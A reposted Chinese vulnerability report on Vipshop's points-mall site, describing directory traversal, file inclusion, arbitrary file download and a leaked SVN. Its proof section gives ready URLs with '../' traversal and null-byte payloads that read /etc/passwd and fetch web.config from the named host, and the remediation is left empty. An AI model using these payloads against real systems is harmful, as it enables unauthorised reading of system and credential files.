网站地图    收藏   

主页 > 后端 > 网站安全 >

唯品会(Vipshop) 目录遍历与文件包含 - 网站安全

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 积分商城,貌似与主站关联。 还不只这些,SVN也泄了.....总之敏感信息太多了,收集些信息干XXOO的事情还算比较容易。详细说明:这里目录遍历 etc/passwd还可以包含?任意文件下载 比如...

积分商城,貌似与主站关联。 还不只这些,SVN也泄了..... 
总之敏感信息太多了,收集些信息干XXOO的事情还算比较容易。
详细说明:
这里目录遍历 etc/passwd
 
还可以包含?
 
任意文件下载 比如web.config
漏洞证明:
目录遍历 etc/passwd
 
http://jf.vipshop.com/jfhoutaiadmin/index.php?a=login&m=../../../../../../../../../../etc/passwd%00
 
 
 
 
这里是包含?好像做了限制!不确定。
 
http://jf.vipshop.com/jfhoutaiadmin/index.php?a=login&m=../../robots.txt%00.php
 

 
 
 
下载文件
 
http://jf.vipshop.com/web.config
 
修复方案:
.....

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论